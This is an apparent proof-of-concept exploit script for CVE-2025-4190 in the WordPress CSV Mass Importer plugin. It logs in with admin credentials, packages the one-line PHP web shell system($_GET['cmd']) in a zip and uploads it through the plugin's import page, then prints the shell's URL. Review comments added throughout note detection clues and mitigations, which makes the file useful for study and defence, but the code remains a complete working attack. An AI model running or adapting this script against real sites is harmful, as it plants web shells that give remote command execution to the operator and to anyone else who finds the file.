POC / CVE-2025-4190.py PY
import argparse
import requests
import sys
import os
import zipfile
from urllib.parse import urljoin
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# Silence urllib3's InsecureRequestWarning for the whole process. The warning
# would otherwise be emitted for unverified HTTPS requests, which is what
# create_session() configures with verify = False; hiding the warning does not
# restore certificate validation.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# Exploit By : Nxploited (Khaled_alenazi)

def create_session():
    """Return the ``requests.Session`` shared by every request in this script.

    The session carries two settings that matter when reading the traffic it
    produces:

    * TLS certificate verification is turned off, so the WordPress
      administrator credentials posted by ``login`` are not protected against
      an on-path party even when the target URL is HTTPS.
    * Every request carries one fixed desktop-Chrome User-Agent string. A
      constant value like this can help correlate the requests in web-server
      logs, but it is trivially changed and is not a reliable indicator alone.
    """
    browser_ua = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"

    http = requests.Session()
    # NOTE(review): verification is disabled for the whole session, not per
    # request, so nothing sent through this object is authenticated by TLS.
    http.verify = False
    http.headers["User-Agent"] = browser_ua
    return http


def login(session, url, username, password):
    """Submit the WordPress login form and report whether a login cookie was set.

    Args:
        session: HTTP session used for the POST; its cookie jar is inspected
            afterwards.
        url: Base URL of the site; ``/wp-login.php`` is appended to it as-is.
        username: Account name sent in the ``log`` field.
        password: Password sent in the ``pwd`` field.

    Returns:
        True when any cookie in the session has ``wordpress_logged_in`` in its
        name, otherwise False.

    The HTTP response itself is never examined: success is inferred only from
    the cookie jar. On the server side this step is an ordinary POST to
    ``wp-login.php`` with ``rememberme`` set to ``forever``.
    """
    credentials = {
        'log': username,
        'pwd': password,
        'rememberme': 'forever',
        'wp-submit': 'Log In',
    }
    session.post(f"{url}/wp-login.php", data=credentials)

    # WordPress names its authentication cookie with this prefix; the script
    # treats its presence as the only proof of a successful login.
    for cookie in session.cookies:
        if 'wordpress_logged_in' in cookie.name:
            print("[+] Logged in successfully.")
            return True

    print("[-] Failed to log in.")
    return False


def prepare_payload():
    """Write the upload archive into the current directory and return its name.

    A one-line PHP file is written to ``nxploited.php``, added to
    ``nxploited.zip`` and then deleted, leaving only the archive behind.

    Returns:
        The archive file name, ``'nxploited.zip'``.

    NOTE(review): the PHP file passes the ``cmd`` query parameter straight to
    ``system()`` with no authentication of its own. Once such a file is stored
    somewhere the web server executes PHP, anyone who can reach its URL can run
    commands, not only the person who uploaded it. The fixed file names used
    here can be searched for on disk and in logs, but they are trivially
    changed; refusing to execute PHP under the uploads directory is the more
    durable control.
    """
    zip_filename = 'nxploited.zip'
    shell_filename = 'nxploited.php'

    # Stage the PHP file on disk first because ZipFile.write() takes a path.
    with open(shell_filename, 'w') as php_file:
        php_file.write("<?php system($_GET['cmd']); ?>")

    with zipfile.ZipFile(zip_filename, 'w') as archive:
        archive.write(shell_filename)

    # Only the archive is kept; the staged copy is removed again.
    os.remove(shell_filename)

    print(f"[+] Payload '{zip_filename}' created successfully.")
    return zip_filename


def upload_payload(session, url, zip_file):
    """POST the archive to the plugin's import page and print the outcome.

    Args:
        session: Authenticated HTTP session (see ``login``).
        url: Base URL of the site.
        zip_file: Path of the archive to send; also used as the upload's
            file name.

    Returns:
        None. The result is only printed.

    The request goes to ``/wp-admin/tools.php?page=cmi-tool`` as a multipart
    form with the archive in the ``cmi_import_upload`` field. The script then
    expects the archive's PHP file to be reachable under
    ``wp-content/uploads/cmi-data/``. For detection and clean-up that gives
    three things to look for: an authenticated POST to that admin page with a
    zip attachment, new ``.php`` files under the ``cmi-data`` upload
    directory, and later GET requests to such a file.

    NOTE(review): HTTP 200 is the only success signal and the response body is
    not inspected, so the success message does not prove the file was stored;
    treat it with care when using this script to confirm a fix.
    """
    upload_url = f"{url}/wp-admin/tools.php?page=cmi-tool"

    form_fields = {
        'cmi_import_source': 'upload',
        'cmi_csv_delim': 'comma',
        'cmi_csv_separ': '2quote',
        'cmi_import_safe': '1',
    }
    extra_headers = {
        "Referer": upload_url,
        "Origin": url,
        "Connection": "keep-alive",
        "Upgrade-Insecure-Requests": "1",
    }

    # The file handle must stay open while requests streams the multipart body.
    with open(zip_file, 'rb') as archive:
        response = session.post(
            upload_url,
            files={'cmi_import_upload': (zip_file, archive, 'application/zip')},
            data=form_fields,
            headers=extra_headers,
        )

    if response.status_code != 200:
        print(f"[-] Failed to upload payload. Status code: {response.status_code}")
        print(f"[-] Server response: {response.text}")
        return

    print("[+] Payload uploaded successfully.")
    shell_path = urljoin(url, 'wp-content/uploads/cmi-data/nxploited.php')
    print(f"[+] Shell URL: {shell_path}")
    print("Exploited By Nxploited (Khaled_alenazi)")


def main():
    """Parse the command line, log in, build the archive and upload it.

    All three options are required. The process exits with status 1 when the
    login step reports failure; otherwise the archive is created in the
    current directory and sent to the site.

    The issue this script targets is described in its own help text as an
    "Admin+" file upload in CSV Mass Importer <= 1.2, i.e. it presupposes
    working administrator credentials. Keeping administrator accounts few and
    well protected therefore limits exposure, alongside removing the plugin or
    updating it if a fixed release exists.

    NOTE(review): the password is taken as a command-line argument, so it can
    end up in shell history and is visible in the process list while the
    script runs.
    """
    cli = argparse.ArgumentParser(
        description="WordPress CSV Mass Importer <= 1.2 - Admin+ Arbitrary File Upload # By Nxploited (Khaled Alenazi)"
    )
    option_table = (
        (('--url', '-u'), 'Target WordPress site URL'),
        (('--username', '-un'), 'WordPress admin username'),
        (('--password', '-p'), 'WordPress admin password'),
    )
    for flags, help_text in option_table:
        cli.add_argument(*flags, required=True, help=help_text)
    opts = cli.parse_args()

    http = create_session()

    if login(http, opts.url, opts.username, opts.password):
        archive_name = prepare_payload()
        upload_payload(http, opts.url, archive_name)
    else:
        sys.exit(1)


# Run only when executed as a script, not when imported.
if __name__ == '__main__':
    main()